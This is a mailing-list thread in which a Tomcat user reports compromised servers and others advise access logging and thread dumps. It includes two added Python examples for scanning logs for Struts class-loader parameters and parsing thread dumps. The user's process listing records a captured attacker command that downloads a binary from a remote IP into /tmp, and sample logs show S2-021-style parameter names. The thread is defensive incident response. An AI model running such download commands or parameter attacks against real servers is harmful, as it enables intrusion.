Re: Regarding i think an intrusion
Hello Christopher, thanks for your response.

I have a copy of 4.sh and squid (binary ELF file) and tried to see, using strings, what this program does. I couldn't see anything =(

I'm monitoring the server to get a dump at the moment this injection occurs.

Files still uploading =(

Thanks for all, kind regards
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-30 14:07 GMT-03:00 Christopher Schultz ch...@christopherschultz.net:
> [...]
Re: Regarding i think an intrusion
Hi,

I am learning to set up a server and I found this article about security:
http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables

On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote:
> Hello list,
>
> I'm facing an issue in 6 tomcat servers that are getting penetrated, and they are executing malicious scripts on my server.
>
> I'm using 7.0.53 on my servers. Running CentOS 5.8.
>
> Let me know what information you need.
>
> PS: This is my first mail to this list, so I apologize for this not gentle presentation.
>
> Saludos.-
> Leonardo Santagostini
> http://ar.linkedin.com/in/santagostini
Re: Regarding i think an intrusion
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote:

> Hello list,
>
> I'm facing an issue in 6 tomcat servers that are getting penetrated, and they are executing malicious scripts on my server.

Can you share more about what they are doing? It might give some clues as to how they are accessing your machines. For example, if they are deploying a WAR file to your server, it could mean that they have access to the Manager application on your server. Any details you can share might be helpful.

> I'm using 7.0.53 on my servers. Running CentOS 5.8.
>
> Let me know what information you need.

Do you have an access log? If not, enable one. If the attacker is not deleting it, it could show you more about who they are and what requests they are executing to access your server. Assuming they are entering through your application and not some other way.

Dan

> PS: This is my first mail to this list, so I apologize for this not gentle presentation.
>
> Saludos.-
> Leonardo Santagostini
> http://ar.linkedin.com/in/santagostini
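Two pieces of advice in this thread fit together: Chris's pointer (further up) to the S2-021 excludeParams workaround, and Dan's suggestion to read the access log. The following Python is an added example written for this page, not code from the thread or from the Struts project. It applies the ParametersInterceptor exclude patterns the way the interceptor does (a pattern must match the whole parameter name) and then runs the same patterns over the parameter names found in the query strings of constructed access-log lines. The two `class` patterns are transcribed from the S2-020 and S2-021 advisories as this editor recalls them, and the default list from struts-default.xml of the 2.3.x line; check both against the linked advisory and your own struts-default.xml before relying on them. The log lines, client addresses and parameter names are made up.

```python
"""Added example: exercise the Struts 2 ParametersInterceptor excludeParams
patterns and run them over access-log query strings. Not from the thread."""
import re
from urllib.parse import urlsplit, parse_qsl

# Default excludeParams of struts-default.xml in the 2.3.x line (assumption:
# transcribed from memory, verify against your copy).
DEFAULT_EXCLUDES = [
    r"^dojo\..*", r"^struts\..*", r"^session\..*", r"^request\..*",
    r"^application\..*", r"^servlet(Request|Response)\..*",
    r"^parameters\..*", r"^action:.*", r"^method:.*",
]
# Pattern added in 2.3.16.1 (S2-020): only a lower-case "class." prefix is blocked.
CLASS_EXCLUDE_2_3_16_1 = r"(.*\.|^)class\..*"
# Pattern the S2-021 advisory gives as the workaround for older releases.
CLASS_EXCLUDE_S2_021 = r"""(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")]|\[).*"""

EXCLUDES_2_3_16_1 = DEFAULT_EXCLUDES + [CLASS_EXCLUDE_2_3_16_1]
EXCLUDES_S2_021 = DEFAULT_EXCLUDES + [CLASS_EXCLUDE_S2_021]


def compile_excludes(patterns):
    return [re.compile(p) for p in patterns]


def is_excluded(param_name, compiled):
    """The interceptor drops a parameter when any exclude pattern matches the
    whole name (Java Matcher.matches(), i.e. re.fullmatch here)."""
    return any(p.fullmatch(param_name) for p in compiled)


def accepted_params(params, compiled):
    """Subset of a request's parameters that would be handed on to OGNL."""
    return {k: v for k, v in params.items() if not is_excluded(k, compiled)}


# Constructed access-log lines (Tomcat "common" pattern); not from the thread.
SAMPLE_ACCESS_LOG = """\
10.0.0.7 - - [27/Apr/2014:03:12:44 -0300] "GET /app/login.action?user.name=bob HTTP/1.1" 200 1842
10.0.0.9 - - [27/Apr/2014:03:12:51 -0300] "GET /app/login.action?Class.classLoader.someProperty=x HTTP/1.1" 200 1842
10.0.0.9 - - [27/Apr/2014:03:13:02 -0300] "GET /app/login.action?class%5B%27classLoader%27%5D.someProperty=x HTTP/1.1" 200 1842
10.0.0.4 - - [27/Apr/2014:03:14:10 -0300] "POST /app/search.action HTTP/1.1" 200 9231
"""
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_requests(log_text, compiled):
    """(line number, offending parameter names) for each log line whose query
    string carries a name the exclude list would reject. Only the query string
    is visible here: parameters in a POST body are not in the access log."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        bad = [k for k, _ in parse_qsl(query, keep_blank_values=True)
               if is_excluded(k, compiled)]
        if bad:
            hits.append((n, bad))
    return hits


if __name__ == "__main__":
    old = compile_excludes(EXCLUDES_2_3_16_1)
    new = compile_excludes(EXCLUDES_S2_021)
    for name in ("user.name", "class.classLoader.someProperty",
                 "Class.classLoader.someProperty", "class['classLoader'].someProperty"):
        print(f"{name:38} 2.3.16.1 blocks: {str(is_excluded(name, old)):5} "
              f"S2-021 blocks: {is_excluded(name, new)}")
    for n, bad in suspicious_requests(SAMPLE_ACCESS_LOG, new):
        print(f"access log line {n}: rejected parameter names {bad}")
```

The point is in the second and third names: the 2.3.16.1 pattern only catches a lower-case `class.` prefix, so `Class.classLoader...` and the bracket form get through to OGNL, which is why S2-021 widened the pattern. Dan's caveat also applies to the log scan: only query strings are logged, so an empty result says nothing about parameters that arrived in a POST body.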
Re: Regarding i think an intrusion
Hello Dan,

Nope, the attacker is executing locally the following:

tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid

And then launch squid, which tries to connect via ssh to various places.

Right now it's time to leave the office, but in a few hours I will paste in pastebin access logs, config files, whatever you tell me.

This is my pstree:

[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
     ├─atop
     ├─crond
     ├─dbus-daemon
     ├─events/0
     ├─events/1
     ├─events/2
     ├─events/3
     ├─httpd───8*[httpd]
     ├─irqbalance
     ├─2*[iscsid]
     ├─iscsiuio───3*[{iscsiuio}]
     ├─java─┬─sh───wget
     │      └─263*[{java}]
     ├─khelper

By the way, the logfiles are really big, 200 MB each one; I'll try to set up a dropbox account so I can share them.

Thanks and regards
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-29 17:34 GMT-03:00 Daniel Mikusa dmik...@gopivotal.com:
> [...]
Re: Regarding i think an intrusion
Sorry, but I forgot to post:

/usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-29 17:41 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
> [...]
Re: Regarding i think an intrusion
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com:
> Hello Dan,
>
> Nope, the attacker is executing locally the following:
>
> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
>
> And then launch squid, which tries to connect via ssh to various places.
>
> Right now it's time to leave the office, but in a few hours I will paste in pastebin access logs, config files, whatever you tell me.
>
> This is my pstree:
>
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> init─┬─atd
>      ├─java─┬─sh───wget
>      │      └─263*[{java}]

sh launched by tomcat's java?

Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

It shall show what the stacktrace is in the thread that launched the external process.

Best regards,
Konstantin Kolinko
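Once the `kill -3` dump that Konstantin and Chris ask for is in catalina.out (where it lands when Tomcat is started through catalina.sh), the question is which thread forked `sh` and which code asked for it. The following Python is an added example for this page, not code from the thread or from Tomcat: it parses a HotSpot-style thread dump, finds the threads whose stack contains a process-spawning frame, and reports the innermost frame that is not JDK code. The dump embedded in it is constructed for the example (thread names, ids and line numbers are made up, and the caller `com.example.webapp.ExportAction` is a placeholder), so its output is illustrative and not a statement about what Leonardo's dump would have shown.

```python
"""Added example: find the thread in a HotSpot thread dump that spawned an
external process and report the first non-JDK frame. Not from the thread."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# '"name" ... nid=0x1234 ...' opens each thread block; nid is the native thread id.
THREAD_HEADER = re.compile(r'^"(?P<name>[^"]+)"(?:.*?\bnid=(?P<nid>0x[0-9a-fA-F]+))?')
# '\tat pkg.Class.method(File.java:12)' or '(Native Method)'
FRAME = re.compile(r'^\s+at\s+(?P<frame>[\w$.<>]+)\((?P<loc>[^)]*)\)')
# Frames that mean "a child process is being started" on Java 6/7 HotSpot.
EXEC_MARKERS = ("java.lang.ProcessBuilder.start", "java.lang.Runtime.exec",
                "java.lang.UNIXProcess.forkAndExec")
# JDK plumbing; the interesting caller is the first frame without these prefixes.
JDK_PREFIXES = ("java.", "javax.", "sun.", "com.sun.", "jdk.")


@dataclass
class ThreadInfo:
    name: str
    nid: Optional[str]  # matches the LWP column of `ps -L` / `top -H`
    frames: List[str] = field(default_factory=list)  # innermost frame first


def parse_thread_dump(text: str) -> List[ThreadInfo]:
    threads, current = [], None
    for line in text.splitlines():
        header = THREAD_HEADER.match(line)
        if header:
            current = ThreadInfo(header.group("name"), header.group("nid"))
            threads.append(current)
            continue
        frame = FRAME.match(line)
        if frame and current is not None:
            current.frames.append(frame.group("frame"))
    return threads


def find_exec_threads(text: str) -> List[Tuple[str, Optional[str], Optional[str]]]:
    """(thread name, nid, first non-JDK frame) for every thread whose stack
    contains a process-spawning frame."""
    hits = []
    for t in parse_thread_dump(text):
        if not any(f.startswith(EXEC_MARKERS) for f in t.frames):
            continue
        caller = next((f for f in t.frames if not f.startswith(JDK_PREFIXES)), None)
        hits.append((t.name, t.nid, caller))
    return hits


# Constructed dump fragment. Thread names, ids and line numbers are made up;
# com.example.webapp.ExportAction is a placeholder for whatever the real dump shows.
SAMPLE_DUMP = """\
Full thread dump Java HotSpot(TM) 64-Bit Server VM (20.14-b01 mixed mode):

"http-bio-8080-exec-7" daemon prio=10 tid=0x00007f3a1c0a1000 nid=0x22c1 runnable [0x00007f3a0f5f2000]
   java.lang.Thread.State: RUNNABLE
\tat java.lang.UNIXProcess.forkAndExec(Native Method)
\tat java.lang.UNIXProcess.<init>(UNIXProcess.java:53)
\tat java.lang.ProcessImpl.start(ProcessImpl.java:65)
\tat java.lang.ProcessBuilder.start(ProcessBuilder.java:452)
\tat java.lang.Runtime.exec(Runtime.java:593)
\tat java.lang.Runtime.exec(Runtime.java:431)
\tat com.example.webapp.ExportAction.execute(ExportAction.java:88)
\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:222)
\tat java.lang.Thread.run(Thread.java:662)

"http-bio-8080-exec-3" daemon prio=10 tid=0x00007f3a1c09e000 nid=0x22bd waiting on condition [0x00007f3a0f6f3000]
   java.lang.Thread.State: WAITING (parking)
\tat sun.misc.Unsafe.park(Native Method)
\tat java.util.concurrent.locks.LockSupport.park(LockSupport.java:156)
\tat java.lang.Thread.run(Thread.java:662)

"VM Thread" prio=10 tid=0x00007f3a1c06d000 nid=0x22a0 runnable
"""

if __name__ == "__main__":
    for name, nid, caller in find_exec_threads(SAMPLE_DUMP):
        print(f"thread {name!r} (nid {nid}) spawned a process; first non-JDK frame: {caller}")
```

The `nid` from the thread header is the native thread id, so it can be matched against the LWP column of `ps -L -p <jvm pid>` or `top -H` to tie the Java thread to what the OS shows while the `sh` child is still alive. Whether the first non-JDK frame is your own action class, a framework class such as Struts/OGNL, or Tomcat's CGI/SSI servlets is what decides between the three explanations Chris lists.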